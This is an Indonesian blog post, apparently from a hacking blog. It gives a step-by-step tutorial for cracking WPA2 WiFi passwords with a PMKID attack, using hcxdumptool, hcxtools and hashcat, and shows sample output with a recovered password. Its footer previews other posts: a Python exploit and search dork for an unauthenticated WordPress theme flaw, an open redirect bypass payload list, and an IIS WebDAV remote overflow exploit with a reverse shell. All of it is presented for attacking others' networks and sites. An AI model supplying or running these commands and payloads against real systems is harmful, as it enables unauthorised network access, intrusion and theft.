Langsung ke konten utama

Tutorial Hack WiFi: Cracking Password WPA2 dengan PMKID Attack

Tutorial Hack WiFi: Cracking Password WPA2 dengan PMKID Attack. Metode cracking WPA2 saat ini lebih mudah setelah ditemukannya teknik PMKID attack dimana kita tidak lagi membutuhkan proses handshake dari jaringan WiFi yang ingin diserang. Itu artinya bahkan meskipun di SSID tersebut sedang tidak ada yang login, kalian tetap bisa melakukan dump PMKID dari router yang menggunakan keamanan WPA2, yang kemudian kita bisa melakukan cracking dari informasi yang didapat tersebut.
Metode ini ditemukan oleh Jens ‘Atom’ Steube, orang dibalik tool cracking populer, Hashcat. Menurutnya, metode ini akan efektif terhadap hampir seluruh router yang menggunakan jaringan 802.11i/p/q/r dengan fungsi roaming diaktifkan.
Oke pertama, kita install dependensi yang dibutuhkan terlebih dahulu.
sudo apt-get update
sudo apt-get install git libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
Selanjutnya install hcxtool
cd /tmp
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
sudo make install
cd /tmp
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
Selanjutnya adalah instalasi hashcat. Di distro pentest seperti Kali Linux atau BackBox, tool ini sudah ada di repository dan dapat diinstall menggunakan perintah
sudo apt-get update && sudo apt-get install hashcat
Namun jika kalian tidak menemukan hashcat di repository, kalian bisa download melalui link berikut:
https://github.com/hashcat/hashcat
Oke lanjut ke proses hack WiFi.
Masuk ke mode monitor terlebih dahulu. Sebelumnya, kalian periksa dulu nama interface network kalian dengan perintah
ifconfig
Oke, interface yang kita gunakan adalah wlan0. Masuk ke mode monitor dengan command
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
Sekarang kita gunakan hcxdumptool untuk menyerang PMKID dari SSID yang rentan.
sudo hcxdumptool -i wlan0 -o pwn.pcapng --enable_status=1
wlan0 adalah nama interface, pwn.pcapng adalah outputnya. Kalian sesuaikan sendiri.
Jika PMKID sudah ditemukan, kalian bisa hentikan proses dengan menekan Ctrl+ C.
Lanjut, kita convert file pcapng agar bisa dicrack menggunakan hashcat.
hcxpcaptool -z pwn.16800 pwn.pcapng
Terakhir adalah proses cracking menggunakan hashcat.
Di real case mungkin kalian bisa menggunakan brute force dengan mencoba seluruh kombinasi karakter 8 digit.
sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Atau, kalian bisa juga menggunakan password list untuk melakukan dictionary attack. List password kalian bebas mau ambil darimana, namun rekomendasi saya adalah ini:
  • https://github.com/danielmiessler/SecLists/tree/master/Passwords
Jika sudah didownload, jalankan command
sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 --force 'wifi-password.txt'
wifi-password.txt adalah nama file berisi kumpulan password. Sesuaikan sendiri.
Output
d5fb59dc80f6c9db1aae2e8c1112bd31*0c3747bda154*60f67797ee0b*4152505553444f4b:44332211
Password WiFinya adalah 44332211.
Oke mungkin sekian tutorial singkat kali ini, semoga bermanfaat. Jika ada yang ingin ditanyakan silahkan tinggalkan komentar.

Komentar

Postingan populer dari blog ini

Wordpress Premium Themes Shopsum Unauthenticated Configuration

# Exploit  Title : Wordpress Premium Themes Shopsum Unauthenticated Configuration Access Vulnerability # Author  : Mr.Buckethead # Date  : November 13th, 2014 # Category  : Web Applications # Vulnerability  : Unauthenticated Configuration Access # Tested  On : Windows 7 32-bit, Backbox # Dork  : inurl:/wp-content/themes/shopsum/hades_framework/ or use ur imagination #Exploit : http://localhost/path/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php # POC  : Save File As Python (.py) = import httplib, urllib # target  site site = "victim" #<--- no http:// or https:// # path  to ajax.php url = "t/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept...

Open Redirect Bypass Cheat Sheet

Open Redirect Bypass Cheat Sheet   Yoo Cherry     August 3, 2019     Cheat Sheet ,  Web Hacking     No Comments Open Redirect Bypass Cheat Sheet.  Open redirect  adalah celah yang memungkinkan attacker untuk mengarahkan pengunjung dari situs terpercaya ke situs malware atau phising tanpa autentifikasi dari admin situs. Bergantung pada arsitektur situs web yang rentan, pengalihan bisa terjadi setelah tindakan tertentu, seperti login, dan terkadang hal itu bisa terjadi seketika saat memuat sebuah halaman. Open Redirect Bypass Cheat Sheet http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] http://0xd8.072.54990 http://www.whitelisteddomain.tld@0xd8.072.54990 http://3H6k7lIAiqjfNeN@0xd8.072.54990 http://XY>.7d8T\205pZM@0xd8.072.54990 http://0xd8.3856078 http://www.whitelisteddomain.tld@0xd8.3856078 http://3H6k7lIAiqjfNeN@0xd8.3856078 http://XY>.7d8T\205pZM@0xd8.3856078 ...

Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow

/*******************************************************************/ /* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */ /* --------------------------------------------------------------- */ /* this is the exploit for ntdll.dll through WebDAV. */ /* run a netcat ex: nc -L -vv -p 666 */ /* wb server.com your_ip 666 0 */ /* the shellcode is a reverse remote shell */ /* you need to pad a bit.. the best way I think is launching */ /* the exploit with pad = 0 and after that, the server will be */ /* down for a couple of seconds, now retry with pad at 1 */ /* and so on..pad 2.. pad 3.. if you haven't the shell after */ /* something like pad at 10 I think you better to restart from */ /* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */ /* on all the others servers it was at 2,3,4, etc..sometimes */ /* you can have the force with you, and get the shell in 1 try */ /* sometimes you need to pad more than 10 times ;) */ /* the shellcode was coded by m...